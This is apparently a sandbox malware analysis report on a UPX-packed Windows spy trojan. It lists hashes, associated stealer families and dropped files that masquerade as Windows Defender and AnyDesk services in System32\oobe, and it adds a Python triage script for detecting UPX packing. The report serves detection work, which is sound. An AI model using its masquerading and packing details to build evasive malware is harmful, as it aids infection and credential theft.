Associated Sample Name / URL | Detection | Threat Name | Context
app__v7.1.7_.msi | malicious | Unknown | 185.199.110.153
file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz | 185.199.110.153
file.exe | malicious | CredGrabber, Meduza Stealer | 185.199.110.153
file.exe | malicious | LummaC, Vidar | 185.199.110.153
file.exe | malicious | LummaC, Stealc, Vidar | 185.199.110.153
file.exe | malicious | Vidar | 185.199.110.153
file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz | 185.199.110.153
CpMQGUserR.exe | malicious | Unknown | 185.199.110.153
Installer.msi | malicious | Unknown | 185.199.110.153
CpMQGUserR.exe | malicious | Unknown | 185.199.110.153
No context
Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 143872
Entropy (8bit): 7.873862373980263
Encrypted: false
SSDEEP: 3072:3fTw5T+B1/TPchSZzA5+fOZmaIJhWLQkD7V2EO0EnGfz9:3U5T+B1LkhSROZmRQLQkDRPEG
MD5: 9CEBC167FF7C8AE3CCFFB718FD7B52D0
SHA1: 8F5FA44298E5498D1CA696DC909093E26F4B5661
SHA-256: EA5CD105B600E7606DE1CBCFE813A7845A3BE878B1E85DBC686871356FAAAC29
SHA-512: CED1F79DD967CBBFEA8D08768EEBD8BD1B319B6EE5726BCF097AE375001DBF86C9A703CE7821468351CCC453C261598C6AC69EB9EB2420E72C3BDD33C3E57C5D
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 42%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........7..od..od..od..le..od..je..od..ke..od..le..od..ke..od..je.od..ne..od..nd.od..fe..od...d..od...d..od..me..odRich..od........................PE..d...]..f.........."....).0...........!.........@.............................@............`................................................. 6..\....0.. ........&..........|7.......................................$..@...........................................UPX0....................................UPX1.....0.......&..................@....rsrc........0.......*..............@..............................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..
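The preview bytes of this dropped file carry the section names UPX0 and UPX1 and a "4.00 ... UPX!" marker after the section table, and the record reports an entropy of 7.87 bits per byte: the classic layout of a UPX-packed PE, which is why the 42% detection rate and the "not started" status say little about what the file does once unpacked. The following is an added triage example, not part of the Joe Sandbox report or the sample, showing how a practitioner would check that layout on a file: it walks the PE section table, measures per-section and whole-file entropy, hashes the bytes so they can be compared with the MD5/SHA-256 fields above, and flags the UPX0/UPX1 structure. The two PE32+ images it builds in memory are constructed sample input; the 0x400 raw-data offset, the section contents, and the 4 KiB window searched for the marker are this example's assumptions.

```python
"""Triage a dropped PE for UPX packing from its section table and entropy.

Added example; not part of the Joe Sandbox report. The two PE32+ images it
builds in memory are constructed sample input, not the dropped files.
"""
import hashlib
import math
import struct
from collections import Counter

SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes
FILE_HDR = "<HHIIIHH"         # IMAGE_FILE_HEADER, 20 bytes


def shannon_entropy(buf):
    """Bits per byte: 0.0 for constant data, close to 8.0 for compressed or encrypted data."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum((c / n) * math.log2(c / n) for c in Counter(buf).values())


def pe_sections(data):
    """Walk the PE header and return (name, virtual_size, raw_size, raw_ptr) per section."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from(FILE_HDR, data, e_lfanew + 4)
    off = e_lfanew + 4 + struct.calcsize(FILE_HDR) + opt_size
    out = []
    for _ in range(nsec):
        name, vsize, _vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        out.append((name.rstrip(b"\0").decode("ascii", "replace"), vsize, rawsize, rawptr))
        off += struct.calcsize(SECTION_HDR)
    return out


def triage(data):
    sections = []
    for name, vsize, rawsize, rawptr in pe_sections(data):
        chunk = data[rawptr:rawptr + rawsize] if rawsize else b""
        sections.append({"name": name, "virtual_size": vsize, "raw_size": rawsize,
                         "entropy": round(shannon_entropy(chunk), 3)})
    upx_names = [s["name"] for s in sections if s["name"].startswith("UPX")]
    # UPX writes its version string and "UPX!" right after the section table;
    # assumption: that lands inside the first 4 KiB. Section names can be
    # renamed, so the marker and the entropy stay separate signals.
    upx_marker = b"UPX!" in data[:0x1000]
    # Classic layout: UPX0 has no raw data (the stub unpacks into it) and UPX1
    # holds the compressed image at near-maximal entropy.
    empty_upx0 = any(s["name"] == "UPX0" and s["raw_size"] == 0 for s in sections)
    dense_upx1 = any(s["name"] == "UPX1" and s["entropy"] > 7.0 for s in sections)
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "entropy": round(shannon_entropy(data), 3),
        "sections": sections,
        "upx_section_names": upx_names,
        "upx_marker": upx_marker,
        "upx_packed": bool(upx_names) or upx_marker,
        "upx_layout_consistent": empty_upx0 and dense_upx1,
    }


def _pseudo_random(n):
    """Deterministic high-entropy filler standing in for a compressed image."""
    out = b"".join(hashlib.sha256(i.to_bytes(2, "big")).digest() for i in range(n // 32 + 1))
    return out[:n]


def build_sample_pe(packed):
    """Build a minimal PE32+ image; assumed layout: headers in the first 0x400 bytes."""
    if packed:
        layout = [(b"UPX0", 0x20000, b""), (b"UPX1", 0x1000, _pseudo_random(4096)),
                  (b".rsrc", 0x1000, b"\0" * 256 + b"RESOURCE" * 8)]
    else:
        layout = [(b".text", 0x1000, b"\x90" * 4096), (b".rdata", 0x1000, b"const" * 200),
                  (b".data", 0x1000, b"\0" * 512)]
    e_lfanew, raw_ptr = 0x80, 0x400
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    file_hdr = struct.pack(FILE_HDR, 0x8664, len(layout), 0, 0, 0, 240, 0x22)
    opt_hdr = struct.pack("<H", 0x20B).ljust(240, b"\0")  # PE32+ magic, rest zeroed
    table, body, ptr, vaddr = b"", b"", raw_ptr, 0x1000
    for name, vsize, content in layout:
        table += struct.pack(SECTION_HDR, name.ljust(8, b"\0"), vsize, vaddr, len(content),
                             ptr if content else 0, 0, 0, 0, 0, 0x60000020)
        body += content
        ptr += len(content)
        vaddr += max(vsize, 0x1000)
    head = dos + b"PE\0\0" + file_hdr + opt_hdr + table
    if packed:
        head += b"4.00\0UPX!"  # where UPX leaves its version and marker
    return head.ljust(raw_ptr, b"\0") + body


if __name__ == "__main__":
    for label, img in (("packed", build_sample_pe(True)), ("plain", build_sample_pe(False))):
        r = triage(img)
        print(label, r["sha256"][:16], r["entropy"], r["upx_packed"], r["upx_layout_consistent"])
        for s in r["sections"]:
            print("  ", s)
```

Run triage() on the bytes of a real dropped file and compare the returned md5/sha256 against the record; a UPX0 section with zero raw size next to a UPX1 section above 7 bits per byte is the layout to expect here, and the unpacked image (upx -d, or a memory dump after the stub has run) is what should go to static analysis and hash-based hunting, not the packed container whose hash changes with every repack.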
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54784
                                                                                                    Entropy (8bit):7.75347884612182
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:L3Yoj7FMTP8V98VHTXVAwkyUdUdTKtouDSeO6CfdRPGj6o8aCA:jYoj7FMTQ98VHTmwF7NKmueeCfHPGm6
                                                                                                    MD5:6E948E7425A1693B64951A8EB2A846C7
                                                                                                    SHA1:D12B91D1CFA5CEFC1EFE917F1B893BCCD1210896
                                                                                                    SHA-256:6D7DF6C7605316BE49804840649D26FF1FBD2F9208A0330EF87247920EDB93FE
                                                                                                    SHA-512:0DCCCB38E919A345DABEE0F40FCF526239EA6D3F4289FC16F5BF6C2BF73A5B564D643BCC522BB63B97E574F59D732640AFD8F20A98BCBDD10F2368E515BF8D3B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......tn.e0.s60.s60.s6{wp75.s6{wv7..s6{ww7:.s6 .p79.s6 .w7>.s6 .v7..s6{wr73.s60.r6i.s6x.z72.s6x..61.s60..61.s6x.q71.s6Rich0.s6........PE..d...<..f.........." ...)......... .......0................................................`.........................................................................................................................8...@...........................................UPX0..... ..............................UPX1.........0......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60416
                                                                                                    Entropy (8bit):7.756024662478089
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:td3pwkJ+vSKrCdQN8ZAO/IYeBcWCgTumOC9N9b:TpwkAEQN8ZAOAYs2gTumOCJ
                                                                                                    MD5:8EB4565C6C7096C17AC94718B2A3724B
                                                                                                    SHA1:1BCEC351F712F041E4B23545E9A14C421EFFCFD3
                                                                                                    SHA-256:C700DC3BB675FB60DD69D26ED9628616C97B64AF7FAAEFF92F6C65E7F4F2B8FE
                                                                                                    SHA-512:5BA97CE8B19EFA125EFB40AAE9B1E1C9FB6A7E45B9261BD8327988C8C5474A5E27AACE3E0CA77A0767740CAEB7BF2060490DC77DEBA7EEE474F6F3A998B1F0A6
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................?..........g.....g.....g....................f......f......F.....f.....Rich....................PE..d...y..f.........."....).........P...:...`.....@.............................P............`.................................................@E.......@..@.......\........... F.......................................<..@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54784
                                                                                                    Entropy (8bit):7.75347884612182
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:L3Yoj7FMTP8V98VHTXVAwkyUdUdTKtouDSeO6CfdRPGj6o8aCA:jYoj7FMTQ98VHTmwF7NKmueeCfHPGm6
                                                                                                    MD5:6E948E7425A1693B64951A8EB2A846C7
                                                                                                    SHA1:D12B91D1CFA5CEFC1EFE917F1B893BCCD1210896
                                                                                                    SHA-256:6D7DF6C7605316BE49804840649D26FF1FBD2F9208A0330EF87247920EDB93FE
                                                                                                    SHA-512:0DCCCB38E919A345DABEE0F40FCF526239EA6D3F4289FC16F5BF6C2BF73A5B564D643BCC522BB63B97E574F59D732640AFD8F20A98BCBDD10F2368E515BF8D3B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......tn.e0.s60.s60.s6{wp75.s6{wv7..s6{ww7:.s6 .p79.s6 .w7>.s6 .v7..s6{wr73.s60.r6i.s6x.z72.s6x..61.s60..61.s6x.q71.s6Rich0.s6........PE..d...<..f.........." ...)......... .......0................................................`.........................................................................................................................8...@...........................................UPX0..... ..............................UPX1.........0......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..
                                                                                                    Process:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54784
                                                                                                    Entropy (8bit):7.75347884612182
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:L3Yoj7FMTP8V98VHTXVAwkyUdUdTKtouDSeO6CfdRPGj6o8aCA:jYoj7FMTQ98VHTmwF7NKmueeCfHPGm6
                                                                                                    MD5:6E948E7425A1693B64951A8EB2A846C7
                                                                                                    SHA1:D12B91D1CFA5CEFC1EFE917F1B893BCCD1210896
                                                                                                    SHA-256:6D7DF6C7605316BE49804840649D26FF1FBD2F9208A0330EF87247920EDB93FE
                                                                                                    SHA-512:0DCCCB38E919A345DABEE0F40FCF526239EA6D3F4289FC16F5BF6C2BF73A5B564D643BCC522BB63B97E574F59D732640AFD8F20A98BCBDD10F2368E515BF8D3B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......tn.e0.s60.s60.s6{wp75.s6{wv7..s6{ww7:.s6 .p79.s6 .w7>.s6 .v7..s6{wr73.s60.r6i.s6x.z72.s6x..61.s60..61.s6x.q71.s6Rich0.s6........PE..d...<..f.........." ...)......... .......0................................................`.........................................................................................................................8...@...........................................UPX0..... ..............................UPX1.........0......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18
                                                                                                    Entropy (8bit):3.9477027792200903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:WhXVXw6:WBVg6
                                                                                                    MD5:6C821BFDE63D9B4473563C6A3CB6E61B
                                                                                                    SHA1:3B0EC0C302AA7DEAE892825DE4CED93E4C5B7E55
                                                                                                    SHA-256:13DCA171E02A846B9203E79CBCEAF8F7F606ECB3BCDC814DDBE4665186087931
                                                                                                    SHA-512:CDEA2098CFFAD892642F77B59413844612759D1A65C2D6CF46F0F6C12E1CBCD31AC0D6D542F81671A8329306429D56999C8952F439BE4F8D4BC4741C78551AB6
                                                                                                    Malicious:false
                                                                                                    Preview:version=20240913..
                                                                                                    Process:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54784
                                                                                                    Entropy (8bit):7.75347884612182
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:L3Yoj7FMTP8V98VHTXVAwkyUdUdTKtouDSeO6CfdRPGj6o8aCA:jYoj7FMTQ98VHTmwF7NKmueeCfHPGm6
                                                                                                    MD5:6E948E7425A1693B64951A8EB2A846C7
                                                                                                    SHA1:D12B91D1CFA5CEFC1EFE917F1B893BCCD1210896
                                                                                                    SHA-256:6D7DF6C7605316BE49804840649D26FF1FBD2F9208A0330EF87247920EDB93FE
                                                                                                    SHA-512:0DCCCB38E919A345DABEE0F40FCF526239EA6D3F4289FC16F5BF6C2BF73A5B564D643BCC522BB63B97E574F59D732640AFD8F20A98BCBDD10F2368E515BF8D3B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......tn.e0.s60.s60.s6{wp75.s6{wv7..s6{ww7:.s6 .p79.s6 .w7>.s6 .v7..s6{wr73.s60.r6i.s6x.z72.s6x..61.s60..61.s6x.q71.s6Rich0.s6........PE..d...<..f.........." ...)......... .......0................................................`.........................................................................................................................8...@...........................................UPX0..... ..............................UPX1.........0......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..
                                                                                                    Process:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):161792
                                                                                                    Entropy (8bit):7.874759486819471
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:s3pAiuZ03rXGkMTCyymEUoRBiaQaS/dqG9fvX7ZYl3QamlPx6AkyWx:obuZ6rXRW/HRag/dqs7ZCQ5Z6Ak/
                                                                                                    MD5:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    SHA1:5E98F7CC5B8BCE4DCEFDDC0313FE1CCC15FFE08C
                                                                                                    SHA-256:0C7B1DAFED4420AAB551544F4CA8813F1556E19442F75046B00BB0C952215456
                                                                                                    SHA-512:B415F4C6D87A3A609FB554E4EE0AF4F27AC8F954E85DAADA7D3034134A5A24B71401819D702F45E24AECE4183059149C56D0936AC25DD4C5A106DC3FD09D1A81
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 32%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\...=...=...=...E...=...E...=...E...=......=......=......=...E...=...=..C=.......=...._..=...=7..=.......=..Rich.=..........PE..d...L..f.........."....).p.......P.......`.....@..........................................`.................................................h...\.......h....`..L,.................................................. ...@...........................................UPX0.....P..............................UPX1.....p...`...l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..
                                                                                                    Process:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18
                                                                                                    Entropy (8bit):3.9477027792200903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:WhXVXw6:WBVg6
                                                                                                    MD5:6C821BFDE63D9B4473563C6A3CB6E61B
                                                                                                    SHA1:3B0EC0C302AA7DEAE892825DE4CED93E4C5B7E55
                                                                                                    SHA-256:13DCA171E02A846B9203E79CBCEAF8F7F606ECB3BCDC814DDBE4665186087931
                                                                                                    SHA-512:CDEA2098CFFAD892642F77B59413844612759D1A65C2D6CF46F0F6C12E1CBCD31AC0D6D542F81671A8329306429D56999C8952F439BE4F8D4BC4741C78551AB6
                                                                                                    Malicious:false
                                                                                                    Preview:version=20240913..
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60416
                                                                                                    Entropy (8bit):7.756024662478089
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:td3pwkJ+vSKrCdQN8ZAO/IYeBcWCgTumOC9N9b:TpwkAEQN8ZAOAYs2gTumOCJ
                                                                                                    MD5:8EB4565C6C7096C17AC94718B2A3724B
                                                                                                    SHA1:1BCEC351F712F041E4B23545E9A14C421EFFCFD3
                                                                                                    SHA-256:C700DC3BB675FB60DD69D26ED9628616C97B64AF7FAAEFF92F6C65E7F4F2B8FE
                                                                                                    SHA-512:5BA97CE8B19EFA125EFB40AAE9B1E1C9FB6A7E45B9261BD8327988C8C5474A5E27AACE3E0CA77A0767740CAEB7BF2060490DC77DEBA7EEE474F6F3A998B1F0A6
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................?..........g.....g.....g....................f......f......F.....f.....Rich....................PE..d...y..f.........."....).........P...:...`.....@.............................P............`.................................................@E.......@..@.......\........... F.......................................<..@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..
                                                                                                    Process:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):161792
                                                                                                    Entropy (8bit):7.874759486819471
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:s3pAiuZ03rXGkMTCyymEUoRBiaQaS/dqG9fvX7ZYl3QamlPx6AkyWx:obuZ6rXRW/HRag/dqs7ZCQ5Z6Ak/
                                                                                                    MD5:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    SHA1:5E98F7CC5B8BCE4DCEFDDC0313FE1CCC15FFE08C
                                                                                                    SHA-256:0C7B1DAFED4420AAB551544F4CA8813F1556E19442F75046B00BB0C952215456
                                                                                                    SHA-512:B415F4C6D87A3A609FB554E4EE0AF4F27AC8F954E85DAADA7D3034134A5A24B71401819D702F45E24AECE4183059149C56D0936AC25DD4C5A106DC3FD09D1A81
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 32%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\...=...=...=...E...=...E...=...E...=......=......=......=...E...=...=..C=.......=...._..=...=7..=.......=..Rich.=..........PE..d...L..f.........."....).p.......P.......`.....@..........................................`.................................................h...\.......h....`..L,.................................................. ...@...........................................UPX0.....P..............................UPX1.....p...`...l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):143872
                                                                                                    Entropy (8bit):7.873862373980263
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:3fTw5T+B1/TPchSZzA5+fOZmaIJhWLQkD7V2EO0EnGfz9:3U5T+B1LkhSROZmRQLQkDRPEG
                                                                                                    MD5:9CEBC167FF7C8AE3CCFFB718FD7B52D0
                                                                                                    SHA1:8F5FA44298E5498D1CA696DC909093E26F4B5661
                                                                                                    SHA-256:EA5CD105B600E7606DE1CBCFE813A7845A3BE878B1E85DBC686871356FAAAC29
                                                                                                    SHA-512:CED1F79DD967CBBFEA8D08768EEBD8BD1B319B6EE5726BCF097AE375001DBF86C9A703CE7821468351CCC453C261598C6AC69EB9EB2420E72C3BDD33C3E57C5D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........7..od..od..od..le..od..je..od..ke..od..le..od..ke..od..je.od..ne..od..nd.od..fe..od...d..od...d..od..me..odRich..od........................PE..d...]..f.........."....).0...........!.........@.............................@............`................................................. 6..\....0.. ........&..........|7.......................................$..@...........................................UPX0....................................UPX1.....0.......&..................@....rsrc........0.......*..............@..............................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..

Process: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 18
Entropy (8bit): 3.9477027792200903
Encrypted: false
SSDEEP: 3:WhXVXw6:WBVg6
MD5: 6C821BFDE63D9B4473563C6A3CB6E61B
SHA1: 3B0EC0C302AA7DEAE892825DE4CED93E4C5B7E55
SHA-256: 13DCA171E02A846B9203E79CBCEAF8F7F606ECB3BCDC814DDBE4665186087931
SHA-512: CDEA2098CFFAD892642F77B59413844612759D1A65C2D6CF46F0F6C12E1CBCD31AC0D6D542F81671A8329306429D56999C8952F439BE4F8D4BC4741C78551AB6
Malicious: false
Preview: version=20240913..

Process: C:\Windows\System32\oobe\AnyDeskUpdateService.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 29
Entropy (8bit): 4.181786496009062
Encrypted: false
SSDEEP: 3:FERMXjGISn:FERMXjGj
MD5: 4142CCE96C2B3EA0DDC84BCCCE8FAF6F
SHA1: 9D5D21B3007BCEBF8B7ACFC5134AE700F22BC9C4
SHA-256: 957DF422654DEF55082544422F1C2E927CD231F78E6F5E11CA7B0EB20DB2483C
SHA-512: DF18B0321410A9C506EF87944E62086DA0E0EFED1EB5B41AAA471E628DB6917B725B2DF4288C1D6F29D4236FEA6F4B3ED515AF71433CA39E07B4AFDAA0691AA6
Malicious: false
Preview: CreateService failed (1073)..
(Win32 error 1073 is ERROR_SERVICE_EXISTS, "The specified service already exists": the service name this process tried to register with CreateService was already present on the analysis machine, so the install step failed and the process wrote this status line instead.)

File type: PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit): 7.874759486819471
TrID:
• Win64 Executable Console (202006/5) 81.26%
• UPX compressed Win32 Executable (30571/9) 12.30%
• Win64 Executable (generic) (12005/4) 4.83%
• Generic Win/DOS Executable (2004/3) 0.81%
• DOS Executable Generic (2002/1) 0.81%
File name: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
File size: 161'792 bytes
MD5: 95408095927f78deffaeb9cb1f4cd44d
SHA1: 5e98f7cc5b8bce4dcefddc0313fe1ccc15ffe08c
SHA256: 0c7b1dafed4420aab551544f4ca8813f1556e19442f75046b00bb0c952215456
SHA512: b415f4c6d87a3a609fb554e4ee0af4f27ac8f954e85daada7d3034134a5a24b71401819d702f45e24aece4183059149c56d0936ac25dd4c5a106dc3fd09d1a81
SSDEEP: 3072:s3pAiuZ03rXGkMTCyymEUoRBiaQaS/dqG9fvX7ZYl3QamlPx6AkyWx:obuZ6rXRW/HRag/dqs7ZCQ5Z6Ak/
TLSH: 2CF3126CC2FC18BFFA96CE34913886947150B6FD2D3CB970981A0CB96972FB5A4C4246
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\...=...=...=...E...=...E...=...E...=.......=.......=.......=...E...=...=..C=.......=...._..=...=7..=.......=..Rich.=.........
Icon Hash: 00928e8e8686b000
Entrypoint: 0x14005c7b0
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x66E3874C [Fri Sep 13 00:29:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 973629af63bcb766c16760645e060863
Instruction (disassembly at the entry point 0x14005c7b0 in section UPX1; this is the UPX decompression stub, not the program's own code. The listing is decoded as 32-bit x86, so every `dec eax` below is really the 0x48 REX.W prefix of the instruction that follows it: `dec eax` / `lea esi, dword ptr [FFFD9845h]` is `lea rsi, [rip+disp32]` (source of the compressed data, which the loop below reads through [esi]), `dec eax` / `lea edi, dword ptr [esi-00035000h]` is `lea rdi, [rsi-0x35000]` (the UPX0 destination the loop writes through [edi]), and `dec eax` / `or ebp, FFFFFFFFh` is `or rbp, -1`.)
push ebx
push esi
push edi
push ebp
dec eax
lea esi, dword ptr [FFFD9845h]
dec eax
lea edi, dword ptr [esi-00035000h]
push edi
xor ebx, ebx
xor ecx, ecx
dec eax
or ebp, FFFFFFFFh
call 00007FF0E8C52C45h
add ebx, ebx
je 00007FF0E8C52BF4h
rep ret
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
rep ret
dec eax
lea eax, dword ptr [edi+ebp]
cmp ecx, 05h
mov dl, byte ptr [eax]
jbe 00007FF0E8C52C13h
dec eax
cmp ebp, FFFFFFFCh
jnbe 00007FF0E8C52C0Dh
sub ecx, 04h
mov edx, dword ptr [eax]
dec eax
add eax, 04h
sub ecx, 04h
mov dword ptr [edi], edx
dec eax
lea edi, dword ptr [edi+04h]
jnc 00007FF0E8C52BE1h
add ecx, 04h
mov dl, byte ptr [eax]
je 00007FF0E8C52C02h
dec eax
inc eax
mov byte ptr [edi], dl
sub ecx, 01h
mov dl, byte ptr [eax]
dec eax
lea edi, dword ptr [edi+01h]
jne 00007FF0E8C52BE2h
rep ret
cld
inc ecx
pop ebx
jmp 00007FF0E8C52BFAh
dec eax
inc esi
mov byte ptr [edi], dl
dec eax
inc edi
mov dl, byte ptr [esi]
add ebx, ebx
jne 00007FF0E8C52BFCh
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jc 00007FF0E8C52BD8h
lea eax, dword ptr [ecx+01h]
jmp 00007FF0E8C52BF9h
dec eax
inc ecx
call ebx
adc eax, eax
inc ecx
call ebx
adc eax, eax
add ebx, ebx
jne 00007FF0E8C52BFCh
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jnc 00007FF0E8C52BD6h
sub eax, 03h
jc 00007FF0E8C52C0Bh
shl eax, 08h
movzx edx, dl
or eax, edx
dec eax
inc esi
xor eax, FFFFFFFFh
je 00007FF0E8C52C4Ah
sar eax, 1
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5d568 | 0x15c | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5d000 | 0x568 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x56000 | 0x2c4c | UPX1
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5d6c4 | 0x1c | .rsrc
